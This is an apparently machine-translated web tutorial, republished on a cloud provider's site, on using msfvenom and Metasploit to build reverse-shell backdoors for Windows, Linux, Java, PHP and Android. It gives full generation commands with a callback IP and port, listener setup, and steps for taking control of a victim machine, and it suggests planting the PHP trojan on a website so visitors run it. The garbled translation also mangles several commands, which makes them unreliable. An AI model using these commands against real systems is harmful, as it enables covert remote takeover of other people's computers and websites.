Home > Others

Msf-shellcode Generation and use

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1      Use Environment

Kali 2.0

Msfvenom

2      Msfvenomparameter Description

Msfvenom–h View Help

Description :

Options:

-P,--payload <payload> specifies the payload ( attack load ) to be used . If you need to use a custom payload, use the & #039;-& #039; or stdin specify

-L,--list [Module_type] lists all available resources for the specified module . module types include : Payloads, encoders, Nops, all

-N,--nopsled <length> Pre-Specifies a NOP sliding length for payload

-F,--format <format> Specify output format ( use --help-formats to get a list of the output formats supported by MSF)

-E,--encoder [encoder] Specifies the encoder(encoder) to be used

-A,--arch <architecture> Specify target architecture for payload

--platform <platform> Specify target platform for payload

-S,--space <length> set maximum length of effective attack load

-B,--bad-chars <list> set evasive character set, for example : & #039;\x00\xff& #039;

-I,--iterations <count> Specify number of codes for payload

-C,--add-code <path> Specify an additional Win32 Shellcode file

-X,--template <path> Specify a custom executable file as a template

-K,--keep protects the template program's actions, injects the payload as a new process runs

--payload-options enumerating the standard options for payload

-O,--out <path> save payload

-V,--var-name <name> Specify a custom variable to determine the output format

--shellest Minimizing the generation of payload

-H,--help view Help Options

--help-formats Viewing the list of output formats supported by MSF

2.1  Life Common Help commands

Msfvenom--help-formats See what formats are output

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/8B/43/wKioL1hI3gjjOgNAAAKV6ft_ZBg812.png "style=" float: none; "title=" 1.png "alt=" Wkiol1hi3gjjognaaakv6ft_zbg812.png "/>


Msfvenom-l encoders See what encoding you have

3      MetasploitGenerate multiple Backdoor

Metasploit can generate various formats of backdoor, php,exe( under the Windows backdoor), the back doorof the Linux environment, Java Backdoor, Androiw back door and so on.

can generate ASP , aspx , PHP , JSP , War , EXE and many other types

It's not there . Msfpayload order, and replace it with a Msfvenom up. msfpayload and Msfencode are integrated inside.

3.1  BuildWindowNext Backdoor program

use the following modules to generate the Windows system under the backdoor.

Windows/meterpreter/reverse_tcp

If you can specify or not specify --arch x86--platform windows when you build a Trojan horse program,do not specify the error prompt, ignore, after-p write the specified payload, the file format is specified after-F.

Msfvenom-p windows/meterpreter/reverse_tcplhost=192.168.1.115 lport=1234-f exe >/aaa.exe

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M01/8B/47/wKiom1hI3gjCzLlRAAEhv5HcAtg646.png "title=" 2.png " Style= "Float:none;" alt= "Wkiom1hi3gjczllraaehv5hcatg646.png"/>

or specify the following parameters:

Use the Generate Trojan command:

Msfvenom-p windows/meterpreter/reverse_tcp--arch x86--platform windows lhost=192.168.1.115 lport=1234-f exe >/ Aaa.exe

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/8B/47/wKiom1hI3grgcyihAAGOFKMRwpw668.png "title=" 3.png " Style= "Float:none;" alt= "Wkiom1hi3grgcyihaagofkmrwpw668.png"/>

the machine that was in the Trojan horse IP address is 192.168.1.123

Copy the Trojan Aaa.exe files produced in Kali 's root directory to the attacked machine to 192.168.1.123 .

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/8B/43/wKioL1hI3grxmHt_AAAwG5Oy2vg956.png "title=" 4.png " Style= "Float:none;" alt= "Wkiol1hi3grxmht_aaawg5oy2vg956.png"/>

======================================================

To set the listener:

using the Monitor module: useExploit/multi/handler

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/8B/47/wKiom1hI3omS5xzOAAM1eEthijI757.png "style=" float: none; "title=" 1.png "alt=" Wkiom1hi3oms5xzoaam1eethiji757.png "/>


using payload

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M02/8B/43/wKioL1hI3orBrXS8AAC0_eD-OpQ566.png "title=" 2.png " Style= "Float:none;" alt= "Wkiol1hi3orbrxs8aac0_ed-opq566.png"/>

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M02/8B/43/wKioL1hI3vSiuE59AAaTqxI1GbM981.png "style=" float: none; "title=" 1.png "alt=" Wkiol1hi3vsiue59aaatqxi1gbm981.png "/>

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M00/8B/43/wKioL1hI3vXSBlhrAADfgOhiA8c563.png "style=" float: none; "title=" 2.png "alt=" Wkiol1hi3vxsblhraadfgohia8c563.png "/>

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/8B/47/wKiom1hI3vmR-ASJAAWCwoV2iA4762.png "style=" float: none; "title=" 3.png "alt=" Wkiom1hi3vmr-asjaawcwov2ia4762.png "/>

Perform monitoring

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/8B/43/wKioL1hI3vqiYBb_AAEdIp1abUM618.png "title=" 4.png " Style= "Float:none;" alt= "Wkiol1hi3vqiybb_aaedip1abum618.png"/>

=================================================

on the attacked machine on the double machine running aaa.exe Trojan, at this time on the Kali above the results are as follows:

description 192.168.1.123 has been in the Trojan, you can control the machine.

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/8B/47/wKiom1hI312AsSEiAALBjjKRbWg696.png "style=" float: none; "title=" 1.png "alt=" Wkiom1hi312asseiaalbjjkrbwg696.png "/>


Enter the console to control the machine by entering the shell .

650) this.width=650; "src=" Http://s4.51cto.com/wyfs02/M01/8B/43/wKioL1hI316C0BdaAAF7T_kB1T8718.png "title=" 2.png " Style= "Float:none;" alt= "Wkiol1hi316c0bdaaaf7t_kb1t8718.png"/>

See if the IP address of the machine is 192.168.1.123

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/8B/47/wKiom1hI32Dg0ZWWAAMjAOpZyzo807.png "title=" 3.png " Style= "Float:none;" alt= "Wkiom1hi32dg0zwwaamjaopzyzo807.png"/>

3.2  BuildLinuxNext Backdoor program

use the following modules to build a Linux backdoor, as you would with Windows backdoor.

Linux/x86/shell_reverse_tcp

The only difference from the Windows system is that the Trojan generated under Linux needs to give this program executable permissions by using the following command chmod:

Chmod +x Program name

Execute the trojan command under Linux:

./ Program name

3.3  BuildJavaBackdoor Procedures

Java Programs can be executed under Windows and under Linux.

Use the following modules to generate a backdoor program:

Java/meterpreter/reverse_tcp

Generate Trojan command:

Msfvenom-p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x>/jar.jar

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/8B/43/wKioL1hI36GC_UTJAACer3BdfFw366.png "style=" float: none; "title=" 1.png "alt=" Wkiol1hi36gc_utjaacer3bdffw366.png "/>


3.4  BuildPhpBackdoor Procedures

Using modules:

Php/meterpreter/reverse_tcp

Generate Trojan command:

Msfvenom-p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x>/php.php

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M02/8B/47/wKiom1hI36LitgJEAAIZIEum3Ag514.png "title=" 2.png " Style= "Float:none;" alt= "Wkiom1hi36litgjeaaizieum3ag514.png"/>

Put the generated trojan php file on the site, when others visit the time will be executed.

3.5  BuildAndroidBackdoor Procedures

Using modules:

Android/meterpreter/reverse_tcp

Generate Trojan command:

Msfvenom-p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x>/android.apk

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/8B/43/wKioL1hI382wVcoCAAJWs0jEjm4508.png "title=" 3.png " alt= "Wkiol1hi382wvcocaajws0jejm4508.png"/>


Msf-shellcode Generation and use

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
php key generation and authentication class use of and while use and function use of if and and how to use create and use databases how to use and while

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More